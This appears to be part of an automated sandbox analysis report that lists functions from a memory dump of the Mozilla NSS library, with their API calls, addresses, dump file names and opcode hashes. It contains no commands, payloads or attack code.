                                                                                                                                                                                                                                                            • Opcode ID: 0cbb34784a92561b1dc16678b22c2bffee221be4101f9d843e112f0cd180fddc
                                                                                                                                                                                                                                                            • Instruction ID: a86963fb197e5aafdf44a55c729a67c3f3f4e60d32fe0338c5e3f2f710481f4f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0cbb34784a92561b1dc16678b22c2bffee221be4101f9d843e112f0cd180fddc
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66029535A083458FD715CF25C680A6AB7F2FF85318F2489ADE89547B11E739E851CF82
                                                                                                                                                                                                                                                            Function 6BE42940 Relevance: 7.8, APIs: 6, Instructions: 327stringCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6BE41360,00000000), ref: 6BE42A19
                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,00000009,00000034,?,?,?,6BE41360,00000000), ref: 6BE42A45
                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,00000000,00000000), ref: 6BE42A7C
                                                                                                                                                                                                                                                              • Part of subcall function 6BE42D50: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,36003739,?,?,00000000,?,6BE4296E), ref: 6BE42DA4
                                                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6BE42AF3
                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,00000009,0000000C,?,?,?,6BE41360,00000000), ref: 6BE42B71
                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,00000034), ref: 6BE42B90
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: memcpystrlen$memset
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 638109778-0
                                                                                                                                                                                                                                                            • Opcode ID: bedadbd2e5b1fa0a22a81ec3b0ea4d5df1cfb2a59e2daae230ce366524725075
                                                                                                                                                                                                                                                            • Instruction ID: a9157838d3594401d685cdfb4390a3e4bb887aefbf4d467269347e866c47195c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bedadbd2e5b1fa0a22a81ec3b0ea4d5df1cfb2a59e2daae230ce366524725075
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8EC1B071F102068BEB04CF69D890BABF7B5BF98308F258169D919DB351D738E852CB91
                                                                                                                                                                                                                                                            Function 6BE5A910 Relevance: 7.7, APIs: 5, Instructions: 241COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: b512baf03d56f77a87102f29f75d6cc72723f95e9c17c2dcbca49c056c1c7eaf
                                                                                                                                                                                                                                                            • Instruction ID: 9f14c78050e50bfb8370c0e2262c7318e496d5134bd88bc8d42fbd6283c9f0a0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b512baf03d56f77a87102f29f75d6cc72723f95e9c17c2dcbca49c056c1c7eaf
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3291F872B402009FDB04DFA4E8C9B6AB7B5BF46304F24206DD64647741DF3EA8A5CBA1
                                                                                                                                                                                                                                                            Function 6BEC8B50 Relevance: 7.7, APIs: 5, Instructions: 218COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CERT_DecodeAVAValue.NSS3 ref: 6BEC8B5C
                                                                                                                                                                                                                                                            • CERT_DecodeAVAValue.NSS3 ref: 6BEC8B67
                                                                                                                                                                                                                                                              • Part of subcall function 6BEC8E00: PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6BEC8EED
                                                                                                                                                                                                                                                              • Part of subcall function 6BEC8E00: SEC_QuickDERDecodeItem_Util.NSS3(?,?,6BFF18D0,?), ref: 6BEC8F03
                                                                                                                                                                                                                                                              • Part of subcall function 6BEC8E00: PR_CallOnce.NSS3(6C022AA4,6BF212D0), ref: 6BEC8F19
                                                                                                                                                                                                                                                              • Part of subcall function 6BEC8E00: PL_FreeArenaPool.NSS3(?), ref: 6BEC8F2B
                                                                                                                                                                                                                                                            • SECITEM_CompareItem_Util.NSS3(?,?), ref: 6BEC8D5C
                                                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6BEC8D6B
                                                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6BEC8D76
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Item_Util$Decode$ArenaPoolValueZfree$CallCompareFreeInitOnceQuick
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 185717074-0
                                                                                                                                                                                                                                                            • Opcode ID: 0b2f8dd38a6241c10cbb34373fa26296834094dbcb1128f17eabedd40295e484
                                                                                                                                                                                                                                                            • Instruction ID: be48a6a80f22f2a7feb1e3c3c45cd86587860ba00bb0ca780d9826387c0c4f1c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b2f8dd38a6241c10cbb34373fa26296834094dbcb1128f17eabedd40295e484
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 41713771E012258FDB148A588A507FFB7F2EB49325F294265D838A73C2D33C9C41C7A2
                                                                                                                                                                                                                                                            Function 6BE95960 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 181stringCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(6BE96AC4,?,?,?,?,?,?,?), ref: 6BE959DD
                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,6BE96AC4,00000000,?,?,?,?,?,?,?,?), ref: 6BE95A0C
                                                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?), ref: 6BE95A3E
                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 6BE95A65
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: memcpystrlen
                                                                                                                                                                                                                                                            • String ID: index '%q'
                                                                                                                                                                                                                                                            • API String ID: 3412268980-1628151297
                                                                                                                                                                                                                                                            • Opcode ID: 04ef990f03617c8d403dab8686a29cc465663419918beeeff68251874b044a1d
                                                                                                                                                                                                                                                            • Instruction ID: 6c4893f493e41e8f29971872097fd6ae2fee5b2f31dd096171cc9beb255e28b5
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 04ef990f03617c8d403dab8686a29cc465663419918beeeff68251874b044a1d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BF61B171D00309CBDB14EFA4E8819EEB7F5BF48315F24402ADA15B7350E779A949CBA1
                                                                                                                                                                                                                                                            Function 6BF2BA20 Relevance: 7.7, APIs: 5, Instructions: 171memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000001,00000000,00000000,00000000,?,?,?,?,6BF291C5), ref: 6BF2BA5A
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: TlsGetValue.KERNEL32(?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF210F3
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: EnterCriticalSection.KERNEL32(?,?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF2110C
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: PL_ArenaAllocate.NSS3(?,?,?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF21141
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: PR_Unlock.NSS3(?,?,?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF21182
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: TlsGetValue.KERNEL32(?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF2119C
                                                                                                                                                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,6BF291C5), ref: 6BF2BA70
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,00000000,?,?,?,?,6BF291C5), ref: 6BF2BA8A
                                                                                                                                                                                                                                                            • PORT_ZAlloc_Util.NSS3(00000000,00000000,00000000,00000000,?,?,?,?,6BF291C5), ref: 6BF2BA95
                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6BF2BB71
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Alloc_ArenaUtilValue$AllocateCriticalEnterErrorSectionUnlockfreememset
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3197566665-0
                                                                                                                                                                                                                                                            • Opcode ID: 4d9fadacc1667eee93b04b1ca75d7fc2fcb274cd9910d226f8a145aad8577e2b
                                                                                                                                                                                                                                                            • Instruction ID: 15956e6d2d2594a1a4bddb0ad75b8c40b73d7ec82280bb850d73305c606632cb
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4d9fadacc1667eee93b04b1ca75d7fc2fcb274cd9910d226f8a145aad8577e2b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EC510473A012428FFB10CFA9C881BA7BBB5EF45315F1448A8DC149B262D77AD842CB91
                                                                                                                                                                                                                                                            Function 6BF67AC0 Relevance: 7.7, APIs: 5, Instructions: 153COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • NSS_SecureMemcmp.NSS3(?,6BF443B7,00000008,?,?,?,?,?,?,6BF43FAF,00000001), ref: 6BF67B3B
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFD01D,00000000), ref: 6BF67B8E
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFD09C,00000000,?,?,?,?,?,?,?,?,?,?,?,?,6BF43FAF,00000001), ref: 6BF67BFE
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFD01D,00000000), ref: 6BF67C14
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFD01D,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BF67C30
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Error$MemcmpSecure
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1457316836-0
                                                                                                                                                                                                                                                            • Opcode ID: e48dcb8c31143a81b3f62409fdbc0b85edd78b0e4fc02dc8540265ec0a8d35b9
                                                                                                                                                                                                                                                            • Instruction ID: dc470208702b6ec38912dd224f6edfcaa5277423d0df8cdd9dda9714e2c9697c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e48dcb8c31143a81b3f62409fdbc0b85edd78b0e4fc02dc8540265ec0a8d35b9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 71511672B00617BAE3148F34DC45BE6F764BF44748F004228ED18572A6FB7965A4CBD1
                                                                                                                                                                                                                                                            Function 6BEDC9E0 Relevance: 7.6, APIs: 5, Instructions: 132COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(00000000,?,?,00000000), ref: 6BEDCA21
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(0000001C), ref: 6BEDCA35
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(00000000), ref: 6BEDCA66
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE041,00000000,00000000,?,?,00000000), ref: 6BEDCA77
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(00000000), ref: 6BEDCAFC
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Unlock$CriticalEnterErrorSectionValue
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1974170392-0
                                                                                                                                                                                                                                                            • Opcode ID: 4d2e8e2fbb9de20b8e0c7cd1a0cf5f88f537b032f936930a80c0c500de1db51c
                                                                                                                                                                                                                                                            • Instruction ID: 981600efdfc9045087bdaf36c1e1c4811d81e465c523a55e945dc16477d0d319
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4d2e8e2fbb9de20b8e0c7cd1a0cf5f88f537b032f936930a80c0c500de1db51c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6041E475F002069FDB00DF64D841A6B7BB4EF45388F244168ED1997351EB79D912CBD1
                                                                                                                                                                                                                                                            Function 6BF34A00 Relevance: 7.6, APIs: 5, Instructions: 126threadCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PR_GetCurrentThread.NSS3 ref: 6BF34A8D
                                                                                                                                                                                                                                                            • CERT_SaveSMimeProfile.NSS3(00000000,00000000,00000000), ref: 6BF34B01
                                                                                                                                                                                                                                                            • CERT_DestroyCertificate.NSS3(00000000), ref: 6BF34B12
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(?,00000000), ref: 6BF34B1F
                                                                                                                                                                                                                                                            • CERT_FindCertByIssuerAndSN.NSS3(?,?), ref: 6BF34B35
                                                                                                                                                                                                                                                              • Part of subcall function 6BF304A0: SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,00000000), ref: 6BF304B9
                                                                                                                                                                                                                                                              • Part of subcall function 6BF304A0: memcmp.VCRUNTIME140(?,?,?,?,?,?,?,?,00000000), ref: 6BF3050A
                                                                                                                                                                                                                                                              • Part of subcall function 6BF304A0: memcmp.VCRUNTIME140(?,00000000,?), ref: 6BF30545
                                                                                                                                                                                                                                                              • Part of subcall function 6BF352E0: PORT_NewArena_Util.NSS3(00000400,6BF34A57,?,00000000), ref: 6BF352F7
                                                                                                                                                                                                                                                              • Part of subcall function 6BF352E0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,6BFF301C,6BF34A57,?,6BF34A57,?,00000000), ref: 6BF35312
                                                                                                                                                                                                                                                              • Part of subcall function 6BF352E0: CERT_FindCertByIssuerAndSN.NSS3(?,?,?,?,?,?,?,6BF34A57,?,00000000), ref: 6BF35327
                                                                                                                                                                                                                                                              • Part of subcall function 6BF352E0: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,6BF34A57,?,00000000), ref: 6BF35334
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Util$Find$Arena_CertIssuermemcmp$CertificateCurrentDecodeDestroyErrorFreeItem_MimeProfileQuickSaveTag_Thread
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3052039812-0
                                                                                                                                                                                                                                                            • Opcode ID: c87d1c886b4d69510c306d8861dbdd76be5f2549a2eb2cefe8871323b4b88e5a
                                                                                                                                                                                                                                                            • Instruction ID: 6eb2f05f21a899fbc185f9b1f35f3fd29eb089ed84e22e8346a568d06dbdb27c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c87d1c886b4d69510c306d8861dbdd76be5f2549a2eb2cefe8871323b4b88e5a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB31E4B3E002215BEF159E75AC42B2B77A8AF41719F1500B8EC149B262E73FC900C7E6
                                                                                                                                                                                                                                                            Function 6BF06AE0 Relevance: 7.6, APIs: 6, Instructions: 125stringCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 6BF06910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6BF06943
                                                                                                                                                                                                                                                              • Part of subcall function 6BF06910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6BF06957
                                                                                                                                                                                                                                                              • Part of subcall function 6BF06910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6BF06972
                                                                                                                                                                                                                                                              • Part of subcall function 6BF06910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6BF06983
                                                                                                                                                                                                                                                              • Part of subcall function 6BF06910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6BF069AA
                                                                                                                                                                                                                                                              • Part of subcall function 6BF06910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6BF069BE
                                                                                                                                                                                                                                                              • Part of subcall function 6BF06910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6BF069D2
                                                                                                                                                                                                                                                              • Part of subcall function 6BF06910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6BF069DF
                                                                                                                                                                                                                                                              • Part of subcall function 6BF06910: NSSUTIL_ArgStrip.NSS3(?), ref: 6BF06A5B
                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,00000000,6BF0781D,?,6BEFBE2C,?,00000000,00000000), ref: 6BF06B66
                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,6BF0781D,?,6BEFBE2C,?,00000000,00000000), ref: 6BF06B88
                                                                                                                                                                                                                                                            • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,6BF0781D,?,6BEFBE2C,?,00000000,00000000), ref: 6BF06BAF
                                                                                                                                                                                                                                                            • free.MOZGLUE(00000000,?,?,?,?,00000000,00000000,6BF0781D,?,6BEFBE2C,?,00000000,00000000), ref: 6BF06BE6
                                                                                                                                                                                                                                                            • free.MOZGLUE(?,?,?,?,?,00000000,00000000,6BF0781D,?,6BEFBE2C,?,00000000,00000000), ref: 6BF06BF7
                                                                                                                                                                                                                                                            • free.MOZGLUE(6BF0781D,?,?,?,?,00000000,00000000,6BF0781D,?,6BEFBE2C,?,00000000,00000000), ref: 6BF06C08
                                                                                                                                                                                                                                                              • Part of subcall function 6BF06C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6BF0781D,00000000,6BEFBE2C,?,6BF06B1D,?,?,?,?,00000000,00000000,6BF0781D), ref: 6BF06C40
                                                                                                                                                                                                                                                              • Part of subcall function 6BF06C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6BF0781D,?,6BEFBE2C,?), ref: 6BF06C58
                                                                                                                                                                                                                                                              • Part of subcall function 6BF06C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6BF0781D), ref: 6BF06C6F
                                                                                                                                                                                                                                                              • Part of subcall function 6BF06C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6BF06C84
                                                                                                                                                                                                                                                              • Part of subcall function 6BF06C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6BF06C96
                                                                                                                                                                                                                                                              • Part of subcall function 6BF06C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6BF06CAA
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
